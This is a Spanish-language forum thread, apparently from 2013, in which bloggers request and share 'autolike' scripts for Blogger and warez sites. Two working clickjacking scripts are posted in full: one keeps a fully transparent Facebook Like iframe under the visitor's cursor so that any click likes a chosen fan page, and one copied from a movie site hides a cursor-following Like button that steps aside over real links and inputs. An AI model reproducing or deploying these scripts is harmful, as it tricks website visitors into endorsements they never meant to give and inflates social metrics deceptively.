Configuración automática Me Gusta al visitar un sitio web

• Autor Autor carloslove
  • Fecha de inicio Fecha de inicio
Yo tengo uno que no aparece el Login o popup de Facebook...
te envio mp...

amigo si no es mucha molestia lo podrías compartir gracias lo ando buscando para blogger como loco espero no sea mucha molestia y me lo puedas enviar saludos y gracias brother 🙂

---------- Post agregado el 30-mar-2013 hora: 01:28 ----------

Ya no me funciona. :s

y cual usaste llevo leyendo todo el hilo y veo que compartieron estos

Ok comparto entonces los que tengo alojados en dropox: Enlace eliminado

Enlace eliminado

Enlace eliminado

Enlace eliminado

Creo que entre los 4 que comparto hay 2 o 1 de wordpress. Comenta que tal te van esos.. :encouragement:

ademas de como otros 3 que solo compartieron con mensajes privados yo ya no si si alguno funciona en verdad
ando buscando uno para blogger que si no esta logeado en facebook no le abra una ventana emergente con el login pero que si s esta logeado en facebook pues marque un me gusta

espero y alguien lo pueda compartir seria de mucha ayuda se lo agradecería

Funciona muy bien! Muchas Gracias!

Hey Xetic podrias compartir el que tu usas porfavor?

Funciona muy bien! Muchas Gracias!

y cual de todos usaste brother ? si hay como unos 6 diferentes en este hilo algunos solo enviados por mp
espero puedas compartir el que te sirvió 🙂

saludos 🙂

y cual de todos usaste brother ? si hay como unos 6 diferentes en este hilo algunos solo enviados por mp
espero puedas compartir el que te sirvió 🙂

saludos 🙂

Este Enlace eliminado

A mi no me funcionó 😕, deja pruebo de nuevo

pero si es un blogg te pueden eliminar la cuenta??

pero si es un blogg te pueden eliminar la cuenta??

eso era lo mismo que pensaba yo que blogger era muy estricto pero al ver el gran éxito que han tenido algunos blog wares muy famosos hoy en día algunos aun hasta con la extencion blogspot y que están mucho mejor posicionados y con mas trafico que una pagina echa en wordpress.org

yo no cambiaba a wordpress por nada antes pero ya me canse de sufrir con los hosting con ataques doss con caídas de la web con una infinidad de problemas que con blogger no nos deben preocupar es por eso que ahora estoy probando con blogger y la verdad estoy encantado 🙂

yo no cambiaba a wordpress por nada antes pero ya me canse de sufrir con los hosting con ataques doss con caídas de la web con una infinidad de problemas que con blogger no nos deben preocupar es por eso que ahora estoy probando con blogger y la verdad estoy encantado 🙂
Te van a asesinar en 3, 2, 1...

---------- Post agregado el 03-abr-2013 hora: 14:53 ----------

¿Estos sistemas de Autolike dan problemas con AdSense?

Me sumo a la pregunta.. pueden traer problemas con Adsense, o con el posicionamiento...?

Te van a asesinar en 3, 2, 1...

---------- Post agregado el 03-abr-2013 hora: 14:53 ----------

¿Estos sistemas de Autolike dan problemas con AdSense?

pero resulta que con esa cuenta la tengo exclusivamente para wares en ningún momento tengo implementado adsense allí ni e dicho que valla implementar adsense solo utilizare adjal, adbooth y otros

yo soy consiente de que adsense no es compatible con wares

2) con que afecte el posicionamiento no lo creo por que casi todos los blogs tienen implementado el autocliked

Última edición:
Hola amigo la segunda parte del codigo no me funcione me muestra error el error que me muestra en blogger es el siguiente:
No se ha podido analizar su plantilla, porque no está bien formada. Asegúrese de que todos los elementos XML se han cerrado correctamente. <br/>Mensaje de error de XML: The reference to entity "layout" must end with the ';' delimiter.

Error 500

si no pueden poner hablenme en pv

pero resulta que con esa cuenta la tengo exclusivamente para wares en ningún momento tengo implementado adsense allí ni e dicho que valla implementar adsense solo utilizare adjal, adbooth y otros

yo soy consiente de que adsense no es compatible con wares
Yo me refiero a si AdSense es compatible con esta técnica de Autolikes de Facebook.

Información muy útil, os felicito me va a venir genial 🙂

me lo puedes pasar?? 🙂

Antes del </head>:

Insertar CODE, HTML o PHP:
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js' type='text/javascript'></script>
<script type='text/javascript'>
var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 50);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
}
}
</script>

Y este otro antes del </body>:

Insertar CODE, HTML o PHP:
<!--facebook like frame-->
<div id='icontainer' style='overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;'>
<iframe allowTransparency='true' frameborder='0' id='fbframe' name='fbframe' scrolling='no' src='http://www.facebook.com/plugins/like.php?href=[COLOR="#0000CD"]https://www.facebook.com/MusicaCristianaGratis[/COLOR]&layout=standard&show_faces =false&width=450&action=like&font=taho ma&colorscheme=light&height=80' style='border:none; overflow:hidden; width:50px; height:23px;'></iframe>
<!--end facebook like frame code-->
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body
function mouseFollower(e){
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}

}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}

</script>

Nota: Cambia la url de facebook que está marcada en azul por la url de tu fan page. No me hago responsable de cualquier problema que pueda dar el script.

Ahora si, hasta luego. Shalom Alejem..

me lo puedes pasar tu autolike ?? 🙂*

Me gusta automatico? Espero que compartan todos su conocimientos. Solo conocia el me gusta comun y corriente que usan todos los blogger

Este es un truco excelente 😉

Alguien tiene un autolike que funcione en verdad correctamente

no como esos que el me gusta aparece invisible que dan muchos problemas como:
1) si no esta legado en facebook aparece ventana emergente pidiendole iniciar secion.
2) el puntero del maus siempre esta como si estuviera seleccionando algo, esto genera mucha desconfianza en los usuarios
3) empiezan con el juego dan un clip aparece un me gusta dan otro clip y se va el me gusta, y así sucesibamente
4) hoy en prácticamente todas las webs utilizan algún autolike, o como argumentan de que lleguen las fanpague esa suma exorbitantes de seguidores
5) si alguien tiene un autolike que funcione correctamente por favor envíeme mp

---------- Post agregado el 27-abr-2013 hora: 15:43 ----------

bueno muchachos encontré esta web Ver peliculas gratis - peliculas online - Ver pelicula gratis
que tiene el autolike y funciona perfecto, el único problema es que si el usuario se da cuenta del me gusta y le da ya no me gusta, este se queda guardado en el cache del navegador y el script no podrá volver a dar un me gusta.

bueno e inspeccionando su código fuente encontré el que creo es el script

HTML:
<script>
//<![CDATA[
 function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}
 FB.init({appId: '124181341013348', status: true, cookie: true, xfbml: true}); 
FB.Event.subscribe('edge.create',function(response) {
	document.getElementById('clickjack-button-wrapper-6').style.display = 'none';
	clickjackt=true;
	setCookie("ackt","100",30);
  }); 

function clickjackJJ(){
		var ck=document.cookie;
		var ckk=ck.indexOf("ackt");
		if(ckk==-1){

document.getElementById('clickjack-button-wrapper-6').style.width= "27px";
		document.getElementById('clickjack-button-wrapper-6').style.height= "20px";

document.getElementById('clickjack-button-wrapper-6').innerHTML = '<fb:like layout="button_count" show_faces="false" class="like_button" href="http://www.facebook.com/Verpeliculagratises" style="float:left;"></fb:like>';}

}</script><script type="text/javascript" src="http://www.facebook.com/jens.luebberstedt" onload="clickjackJJ()"></script> 
	<script type="text/javascript" >
		var jQ = 30;
		jQuery( document ).ready( function() {
			 jQuery( "#clickjack-button-wrapper-6" ).parent().mousemove( function( e ) {

jQuery( "#clickjack-button-wrapper-6" ).css( {
					top: e.pageY - 10,
					left: e.pageX + 50

} );

} );
                        clickjack_hider();
						var jb = (jQ * 20) / 10;
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",500);

} );
                        function clickjack_hider(){

jQuery("input").mouseout(function(){ClickJackFbShow();});
			jQuery("a").mouseout(function(){ClickJackFbShow();});
			jQuery("button").mouseout(function(){ClickJackFbShow();});
			jQuery("textarea").mouseout(function(){ClickJackFbShow();});
			jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});			
			jQuery("object").mouseout(function(){ClickJackFbShow();});

jQuery("input").mouseover(function(){ClickJackFbHide();});
			jQuery("a").mouseover(function(){ClickJackFbHide();});
			jQuery("button").mouseover(function(){ClickJackFbHide();});
			jQuery("textarea").mouseover(function(){ClickJackFbHide();});
			jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});			
			jQuery("object").mouseover(function(){ClickJackFbHide();});

}
	//]]></script>

aun no estoy seguro si le sobra algo así que pruebenlo y comenten 🙂 si les funciono

Última edición:
Atrás